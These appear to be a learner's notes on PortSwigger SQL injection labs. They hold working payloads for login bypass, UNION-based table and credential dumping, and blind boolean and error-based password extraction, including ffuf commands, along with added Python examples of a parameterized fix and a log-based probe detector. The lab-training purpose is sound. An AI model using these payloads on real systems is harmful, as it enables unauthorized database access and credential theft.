# SQL Injection

<https://portswigger.net/web-security/sql-injection>

* What SQL injection (SQLi) is.
* How to find and exploit different types of SQLi vulnerabilities.
* How to prevent SQLi.

**SQLi** is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.

***

#### Ideas <a href="#ideas" id="ideas"></a>

`Ideas noted while working through this vulnerability topic.`

Take the character-comparison approach from the blind labs (`SUBSTRING(..., 1, 1) > 'm'`, i.e. comparing character codes) and automate it.

Bugbounty: <https://hackerone.com/opportunities/all/search?vdp=true&ordering=Newest+programs>

Create an automation that writes the FUZZ2 output ordered by FUZZ1 (the character position).

***

`SELECT * FROM products WHERE category = 'Gifts' AND released = 1`

URL: `https://0ab7007a0308a5e1825b16a7004100b0.web-security-academy.net/filter?category=Accessories`

Payload: `Accessories'OR+1=1--`

***

### Lab: SQL injection vulnerability allowing login bypass <a href="#lab-lab-sql-injection-vulnerability-allowing-login-bypass" id="lab-lab-sql-injection-vulnerability-allowing-login-bypass"></a>

ID: administrator\
password: `' OR 1=1--`
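The bypass above works because the application builds its query by concatenating the submitted strings. As an added example (not part of these notes or of the PortSwigger lab), the following Python script reproduces that against an in-memory SQLite database with constructed sample users, then shows the same payload failing against a parameterized query, which is the standard prevention. The table and column names, sample credentials and function names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory SQLite database with a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("administrator", "s3cret-admin"), ("wiener", "peter")],
    )
    return conn


def build_query_vulnerable(username, password):
    # The query is assembled by string formatting, so a quote in the input
    # closes the literal and the rest of the input becomes SQL syntax.
    return (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )


def login_vulnerable(conn, username, password):
    # With password = "' OR 1=1--" the WHERE clause becomes
    #   username = 'administrator' AND password = '' OR 1=1--'
    # which is true for every row, so a row comes back and login "succeeds".
    row = conn.execute(build_query_vulnerable(username, password)).fetchone()
    return row is not None


def login_safe(conn, username, password):
    # Parameter placeholders: the driver sends the values separately from the
    # SQL text, so a quote in the input is just data and can never close the literal.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"
    print(build_query_vulnerable("administrator", payload))
    print("vulnerable login:", login_vulnerable(db, "administrator", payload))
    print("parameterized login:", login_safe(db, "administrator", payload))
```

Running it prints the injected query, `True` for the concatenated version and `False` for the parameterized one; only the real credentials log in through `login_safe`.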

***

### SQL injection UNION attacks <a href="#sql-injection-union-attacks" id="sql-injection-union-attacks"></a>

### Examining the database in SQL injection attacks <a href="#examining-the-database-in-sql-injection-attacks" id="examining-the-database-in-sql-injection-attacks"></a>

To exploit SQL injection vulnerabilities, it's often necessary to find information about the database. This includes:

* The type and version of the database software.
* The tables and columns that the database contains.

### Lab: SQL injection attack, querying the database type and version on Oracle <a href="#lab-sql-injection-attack-querying-the-database-type-and-version-on-oracle" id="lab-sql-injection-attack-querying-the-database-type-and-version-on-oracle"></a>

Analysis:

**(1) Determine the number of columns**

```
' order by 3-- -> internal server error
```

`order by 3` fails, so the query returns 3 - 1 = 2 columns.

**(2) Determine the data types of the columns and query the version**

Attempts that failed:

```
SELECT * FROM V$VERSION -> error
' UNION SELECT 'a', 'a'-- -> Internal Server Error (Oracle needs a FROM clause, e.g. FROM dual)
'UNION SELECT * FROM v$version-- -> 500 Internal Server Error
'UNION%20SELECT%20*%20FROM%20v%24version--
'UNION SELECT version, NULL FROM v$instance-- -> 500 Internal Server Error
```

**SQLi query on Oracle DB:**

```
'UNION SELECT banner, NULL FROM v$version--
'UNION%20SELECT%20banner%2c%20NULL%20FROM%20v%24version--
```

***

### Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft <a href="#lab-sql-injection-attack-querying-the-database-type-and-version-on-mysql-and-microsoft" id="lab-sql-injection-attack-querying-the-database-type-and-version-on-mysql-and-microsoft"></a>

Errors:

```
'UNION+SELECT+@@version
```

```
'OR+1=1--
'UNION+SELECT+@@version
'SELECT+@@version
'order+by+1# -> all errors in browser
```

With Burp Suite:

**Analysis 'category' parameter:**

(1) Determine the number of columns:\
`' order by 3--` -> internal server error\
= 2 columns.

```
GET /filter?category=Clothing%2c+shoes+and+accessories'order+by+3# HTTP/2
```

(2) Determine the database type and version (MySQL or Microsoft):

```
query: 'UNION SELECT @@version,NULL#
GET /filter?category=Clothing%2c+shoes+and+accessories'UNION%20SELECT%20%40%40version%2cNULL%23
```

`Browser Response:`

`Burp Suite Response:`

```
Without Query:
```

```
With SQLi Query:
```

**Requests made via the URL in the browser, like `'order+by+1#`, did not work, but in Burp they did.**

***

### Lab: SQL injection attack, listing the database contents on non-Oracle databases <a href="#lab-sql-injection-attack-listing-the-database-contents-on-non-oracle-databases" id="lab-sql-injection-attack-listing-the-database-contents-on-non-oracle-databases"></a>

**End goals:**

* Determine a table that holds usernames and passwords
* Determine columns
* Output content table
* Login with 'administrator' user

**Analysis:**

(1) Find the number of columns\
`'` -> Internal Server Error\
`#` -> ok\
`' order by 1--`\
2 columns

(2) Find the database type

```
' UNION SELECT version(),NULL--
'+UNION+SELECT+version(),NULL--
```

db = PostgreSQL\
`PostgreSQL 12.16 (Ubuntu 12.16-0ubuntu0.20.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, 64-bit`

(3) List the tables in the database\
PostgreSQL has `information_schema.tables`.\
Most database types (except Oracle) have this set of information-schema views.\
Example:

`' UNION SELECT table_name,null FROM information_schema.tables--`

(4) Find the username and password of administrator

`' UNION SELECT table_name,null FROM information_schema.tables--`

`' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='pg_user'--`

`' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='tables'--`

`' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='users_mcwdbl'--`

`' UNION SELECT username_knetyj, null FROM users_mcwdbl--`

```
wiener
administrator
carlos
```

`' UNION SELECT password_gbqglo, null FROM users_mcwdbl--`

```
alht4jjlilpjo0mms3fw -> administrator
mgy86mxw90djyfz4wimj
ir4subxbcc63bk19o2uq
```

```
user: administrator
password: alht4jjlilpjo0mms3fw
```

Errors or attempts:

```
' UNION SELECT * FROM information_schema.tables-- -> 500 Internal Server Error

'+UNION+SELECT+NULL+AS+column1,+table_name+AS+column2+FROM+information_schema.tables--

' UNION SELECT pg_user,null FROM information_schema.tables--

' UNION SELECT pg_user,null FROM information_schema.tables.table_name--
' UNION SELECT table_name,null FROM information_schema.columns WHERE table_name = ' pg_user'--
'%20UNION%20SELECT%20table_name%2cnull%20FROM%20information_schema.columns%20WHERE%20table_name%20%3d%20'pg_user'--

'SELECT+UNION+column_name+FROM+information_schema.columns+WHERE+table_name%3d'pg_user'--
'+UNION+SELECT+column_name+FROM+information_schema.columns+WHERE+table_name%3d'pg_user'--

' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='pg_user'--
```

***

### Lab: SQL injection attack, listing the database contents on Oracle <a href="#lab-sql-injection-attack-listing-the-database-contents-on-oracle" id="lab-sql-injection-attack-listing-the-database-contents-on-oracle"></a>

**End goal:**

The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.

**Analysis:**

(1) Number of columns

```
'order by 1--
'order by 2--
'order by 3-- -> Internal Server Error
```

Number of columns = 2

(2) DB type = Oracle; test the Oracle version query

```
'UNION SELECT banner, NULL FROM v$version--
```

Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

(3) List the table names

```
'UNION SELECT table_name, NULL from all_tables--
```

Found: USERS\_UWXAOL

(4) List the columns in the 'USERS\_UWXAOL' table

```
'UNION SELECT column_name, null FROM all_tab_columns WHERE table_name = 'USERS_UWXAOL'-- -
```

Column: USERNAME\_CXPDBW\
Column: PASSWORD\_PKHNMW

(5) List the contents of the columns

```
'UNION SELECT USERNAME_CXPDBW, PASSWORD_PKHNMW FROM USERS_UWXAOL-- -
```

user: administrator\
password: ue2n77amwhlqk9vitulu

***

### Lab: SQL injection UNION attack, determining the number of columns returned by the query <a href="#lab-sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query" id="lab-sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query"></a>

**End goal:**

To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.

**Analysis:**

(1) Find the column number

```
'order by 1-- -
'order by 2-- -
'order by 3-- -
'order by 4-- - -> Internal Server Error
```

```
'UNION SELECT NULL-- -
'UNION SELECT NULL,NULL-- -
'UNION SELECT NULL,NULL,NULL-- -
'UNION SELECT NULL,NULL,NULL,NULL-- - -> Internal Server Error
```

Column number = 3.

In the browser:\
`'order by 1-- -`\
`'UNION SELECT NULL-- -`

***

### Lab: SQL injection UNION attack, finding a column containing text <a href="#lab-sql-injection-union-attack-finding-a-column-containing-text" id="lab-sql-injection-union-attack-finding-a-column-containing-text"></a>

**End Goal:**

The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

**Analysis:**

(1) Find the column number

```
'UNION SELECT NULL-- -
'UNION SELECT NULL,NULL-- -
'UNION SELECT NULL,NULL,NULL-- -
'UNION SELECT NULL,NULL,NULL,NULL-- - -> Internal Server Error
```

(2) Find the column that accepts string data

```
'UNION SELECT 'a',NULL,NULL-- - -> Internal Server Error
'UNION SELECT NULL,'a',NULL-- -
'UNION SELECT NULL,NULL,'a'-- - -> Internal Server Error
```

`'UNION SELECT NULL,'qm4JyW',NULL-- -`

***

### Lab: SQL injection UNION attack, retrieving data from other tables <a href="#lab-sql-injection-union-attack-retrieving-data-from-other-tables" id="lab-sql-injection-union-attack-retrieving-data-from-other-tables"></a>

**End goals:**

The database contains a different table called users, with columns called username and password.

To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

**Infos:**

**Table** = 'users';\
**Column** = 'username', 'password'

**Analysis:**

(1) Column number\
Column number = 2

(2) Database query

```
'UNION SELECT username,password FROM users-- -
```

username: administrator\
password: 8qcc99qn9jiic9zx376k

***

### Lab: SQL injection UNION attack, retrieving multiple values in a single column <a href="#lab-sql-injection-union-attack-retrieving-multiple-values-in-a-single-column" id="lab-sql-injection-union-attack-retrieving-multiple-values-in-a-single-column"></a>

**End Goals:**

The database contains a different table called users, with columns called username and password.

To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

**Infos:**

**Table** = 'users';\
**Column** = 'username', 'password'

**Analysis:**

(1) Column number

```
'UNION SELECT null,null-- -
```

Column number = 2

(2) Verify which column accepts string data

```
'UNION SELECT null,null-- - -> Internal Server Error
'UNION SELECT null,'a'-- -
```

(3) Use `||` (string concatenation) to return multiple values in a single column

```
'UNION SELECT NULL, username || ' ~ ' || password FROM users-- -
```

***

### Blind SQL injection <a href="#blind-sql-injection" id="blind-sql-injection"></a>

### What is blind SQL injection? <a href="#what-is-blind-sql-injection" id="what-is-blind-sql-injection"></a>

Techniques such as UNION attacks are not effective against blind SQL injection vulnerabilities, because they rely on being able to **see** the results of the injected query within the application's responses. It is still **possible** to exploit blind SQL injection to access unauthorized data.

### Exploiting blind SQL injection by triggering conditional responses <a href="#exploiting-blind-sql-injection-by-triggering-conditional-responses" id="exploiting-blind-sql-injection-by-triggering-conditional-responses"></a>

Application uses tracking cookies to gather analytics about usage.

**Request:**

```
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
```

When the 'TrackingId' parameter is processed, the application runs a query like:

**Query:**

```
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'
```

If you submit a recognized 'TrackingId', the query returns data and you receive a "Welcome back" message in the response.

To test whether 'TrackingId' is injectable:

```
…xyz' AND '1'='1 -> "Welcome back" message is displayed
…xyz' AND '1'='2 -> message is not displayed
```

### Exploiting blind SQL injection by triggering conditional responses - Continued <a href="#exploiting-blind-sql-injection-by-triggering-conditional-responses-continued" id="exploiting-blind-sql-injection-by-triggering-conditional-responses-continued"></a>

**Example:**

**Infos:**

**Table:** 'Users';\
**Columns:** 'Username', 'Password';\
**User:** 'Administrator';\
You can determine the password for this user by sending inputs that test it one character at a time.

**Input:**

```
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'administrator'), 1, 1) > 'm
```

If the "Welcome back" message is returned, the first character of the password is greater than 'm'.

If **not**, the first character of the password is **not** greater than 'm'.

**Then:**

```
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's
```

You can continue this process systematically to determine the full password.

**Note:** The 'SUBSTRING' function is called 'SUBSTR' on some other databases.

***

### Lab: Blind SQL injection with conditional responses <a href="#lab-blind-sql-injection-with-conditional-responses" id="lab-blind-sql-injection-with-conditional-responses"></a>

**End goals:**

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

**Infos:**

**Table:** 'users';\
**Columns:** 'username', 'password';\
**User:** 'administrator';

**Analysis:**

(1) Find the tracking cookie\
TrackingId = SbFU4ujbGj9HwD58

(2) Confirm that a **users table** exists and contains the **username 'administrator'**

```
'AND (SELECT 'x' FROM users LIMIT 1)='x' AND (SELECT username FROM users WHERE username = 'administrator')='administrator'-- -
```

(3) Narrow down the first character of the password

```
'AND SUBSTRING((SELECT Password FROM Users WHERE Username='administrator'),1,1)>'m'-- -
```

First character > 'm'

(4) Continue testing

```
'AND SUBSTRING((SELECT Password FROM Users WHERE Username='administrator'),1,1)='w'-- -
```

First character of the password = 'w'

(5) Second character of the password

```
'AND SUBSTRING((SELECT Password FROM Users WHERE Username='administrator'),2,1)='h'-- -
```

Second character of the password = 'h'

(6) Find the password length

```
'AND SUBSTRING((SELECT password FROM users WHERE username='administrator'), §1§,1) > '0'-- -
```

(7) Password with Burp Suite 'Intruder'

```
1  2
2  6
3  i
4  t
5  e
6  f
7  h
8  p
9  j
10 f
11 n
12 o
13 9
14 5
15 k
16 8
17 z
18 h
19 9
20 p
```

Password = '26itefhpjfno95k8zh9p'

(8) Find the password with 'ffuf'

```
ffuf -u https://0ae000a604bed72d8088302a006a009f.web-security-academy.net/ -w ./LabSQLiListParameter1.txt:FUZZ1 -w ./LabSQLiListParameter2.txt:FUZZ2 -b "TrackingId=BsRLGSgdlnyuSjOA'AND SUBSTRING((SELECT password FROM users WHERE username='administrator'), FUZZ1, 1) = 'FUZZ2'-- -" -c
```

**Errors:**

```
'AND SUBSTRING((SELECT Password FROM Users WHERE Username ='Administrator'),1,1)>'m-- -

' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm

'AND SUBSTRING((SELECT password FROM Users WHERE table_name='Administrator'),1,1)>'b-- -
```

***

### Error-based SQL injection <a href="#error-based-sql-injection" id="error-based-sql-injection"></a>

Cases where you're able to use error messages to either extract or infer sensitive data from the database:

* You can induce the application to return a specific error response based on the result of a boolean expression.
* You can trigger error messages that output the data returned by the query, turning a blind SQL injection into a visible one.

### Exploiting blind SQL injection by triggering conditional errors <a href="#exploiting-blind-sql-injection-by-triggering-conditional-errors" id="exploiting-blind-sql-injection-by-triggering-conditional-errors"></a>

Some applications carry out SQL queries but their behavior doesn't change regardless of whether the query returns any data. The conditional-response **technique won't work** here, because injecting different boolean conditions makes no difference to the application's responses. Instead, make the database raise an error conditionally:

```
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
```

* In the first payload, 1=2 is false, so the CASE takes the ELSE branch and the comparison becomes 'a'='a': no error.
* In the second payload, 1=1 is true, so the THEN branch evaluates 1/0 and causes a divide-by-zero error.
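From the defender's side, the column-enumeration probes from the UNION labs above and the conditional-response and conditional-error probes described in this section all leave recognisable traces in request logs. As an added example (not part of these notes or of PortSwigger's material), the Python script below runs a few detection patterns over constructed access-log lines whose last quoted field is assumed to hold the Cookie header: it URL-decodes each request, tags the technique it matches, and flags sources that send enough probes to look like character-by-character enumeration. The log layout, sample lines, pattern names and threshold are all assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Assumed probe signatures, each named after the technique it reflects.
PATTERNS = {
    "union-column-count": re.compile(r"union\s+select\b|order\s+by\s+\d+", re.I),
    "boolean-condition": re.compile(r"'\s*(and|or)\s+'?\d+'?\s*=\s*'?\d+", re.I),
    "substring-oracle": re.compile(r"\b(substring|substr)\s*\(\s*\(?\s*select\b", re.I),
    "conditional-error": re.compile(r"case\s+when\b.*\bthen\s+(to_char\()?1/0", re.I),
}

# Assumed log layout: ip - - [time] "METHOD path PROTO" status size "Cookie header"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"$'
)

# Constructed sample lines: one benign request, two UNION/ORDER BY probes from
# one source, and three blind-SQLi probes (the payload shapes from this page)
# from another.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /filter?category=Gifts HTTP/1.1" 200 5120 "TrackingId=u5YD3PapBcR4lN3e7Tj4"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /filter?category=Gifts%27+order+by+3-- HTTP/1.1" 500 2226 "TrackingId=abc"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /filter?category=Gifts%27+UNION+SELECT+NULL,NULL-- HTTP/1.1" 200 5300 "TrackingId=abc"',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 5120 "TrackingId=xyz%27+AND+%271%27%3D%271"',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 5120 "TrackingId=xyz%27+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username%3D%27administrator%27),1,1)%3E%27m"',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 500 2226 "TrackingId=xyz%27+AND+(SELECT+CASE+WHEN+(1%3D1)+THEN+1/0+ELSE+%27a%27+END)%3D%27a"',
]


def decode(value):
    """Probes are usually URL-encoded once, sometimes twice; decode until stable."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    return value


def classify(request_text):
    """Return the names of every probe pattern found in the decoded text."""
    text = decode(request_text)
    return [name for name, rx in PATTERNS.items() if rx.search(text)]


def parse_line(line):
    """Split one log line into its fields, or None if it does not fit the layout."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status, cookie = m.groups()
    return {"ip": ip, "method": method, "path": path, "status": int(status), "cookie": cookie}


def detect(lines, threshold=3):
    """Per source IP: techniques seen, probe count, and whether the volume of
    probes looks like character-by-character enumeration."""
    hits = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that do not fit the assumed layout
        for name in classify(rec["path"] + " " + rec["cookie"]):
            hits[rec["ip"]][name] += 1
    return {
        ip: {
            "techniques": sorted(counter),
            "probe_count": sum(counter.values()),
            "enumeration": sum(counter.values()) >= threshold,
        }
        for ip, counter in hits.items()
    }


if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_LOG).items():
        print(ip, finding)
```

The threshold is deliberately low for the six-line sample; on real traffic a blind extraction shows up as hundreds of near-identical requests from one source that differ only in a position index and one character, so the count per source over a short window is the more useful signal than any single pattern hit.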

### Lab: Blind SQL injection with conditional errors <a href="#lab-blind-sql-injection-with-conditional-errors" id="lab-blind-sql-injection-with-conditional-errors"></a>

#### End Goals: <a href="#end-goals-5" id="end-goals-5"></a>

Discover the db

**Infos:**

**table:** users;\
**columns:** 'username', 'password'\
**user:** administrator

**Analysis**

(1) Test the SQLi query and discover the DB

```
' -> 500 Internal Server Error
''
'|| (select '') ||' -> 500 Internal Server Error (not PostgreSQL)
'||(select '' FROM dual)||' -> oracle db
```

(2) Confirm the 'users' table exists in the DB

```
'||(SELECT '' FROM users)||' -> 500 Internal Server Error
'||(SELECT '' FROM users WHERE rownum=1)||'
```

The 'users' table exists.

(3) Confirm the 'administrator' username exists

```
'||(SELECT username FROM users WHERE username='administrator')||'

'||(select '' from users where username='administrator')||'' [best]
```

(4) Test whether the parameter is vulnerable (conditional error)

```
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator') ||' -> 500 Internal Server Error
'||(SELECT CASE WHEN (1=0) THEN TO_CHAR(1/0) ELSE '' END from users WHERE username='administrator')||' -> 200 OK
```

`Response -> 500 Internal Server Error = administrator user exists`

`Response -> 200 OK = does not exist "username='NOT EXISTadministrator'"`

(5) Find the password length

```
'|| (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator' AND LENGTH(password)>15)||'
```

`Response -> 500 Internal Server Error then password>15`

`Response -> 200 OK`

`Response -> 500 Internal Server Error then (password=20)`

(6) Discover the first character of the password

```
'|| (SELECT CASE WHEN (1=1) then TO_CHAR(1/0) ELSE '' END FROM dual WHERE username='administrator AND SUBSTR(password)>0') ||'
```

`Response -> 500 Internal Server Error then password>4`

`Response -> 200 OK then password is NOT > 5, password=5.`

`Response -> Error == password=5`

(7) Find the password with 'Comparer'

```
'|| (SELECT case WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator' AND SUBSTR(password,§1§,1)='§5§')||'
```

(8) Find the password with 'ffuf'

```
ffuf -u https://0aaf00e303945b7f802d03f1007c00ae.web-security-academy.net/ -w ./Numbers1-20Wordlist.txt:FUZZ1 -w ./AsciiPasswordWordlist.txt:FUZZ2 -b "TrackingId=yWhlx83xuq5dNO6d'|| (SELECT case WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator' AND SUBSTR(password,FUZZ1,1)='FUZZ2')||'" -mc 500 -t 200 -c
```

```
[Status: 200, Size: 11439, Words: 5275, Lines: 287, Duration: 283ms]
    * FUZZ1: 20
    * FUZZ2: 2
```

Only the true password character matches:

```
[Status: 500, Size: 2226, Words: 886, Lines: 46, Duration: 253ms]
    * FUZZ1: 9
    * FUZZ2: 0
```

`Then:`

```
1  t
2  l
3  3
4  7
5  6
6  n
7  4
8  9
9  0
10 l
11 u
12 y
13 o
14 g
15 c
16 i
17 4
18 x
19 2
20 z
```

password = 'tl376n490luyogci4x2z'

Errors:

```
'AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
'AND (SELECT CASE WHEN (1=1) THEN 1/1 ELSE 'a' END)='a'--

' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
```

Conditional-error syntax per database:

```
Oracle      SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM dual
Microsoft   SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END
            (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a'
PostgreSQL  1 = (SELECT CASE WHEN (1=1) THEN 1/(SELECT 0) ELSE NULL END)
MySQL       SELECT IF(1=1,(SELECT table_name FROM information_schema.tables),'a')
```

MySQL error-based attempts:

```
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
```

Comparing the two password candidates position by position:

```
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
t l 3 6 6 n 4 9 0 l  u  y  o  g  x  i  4  x  2  z
tl366n490luyogxi4x2z
tl376n490luyogci4x2z
```

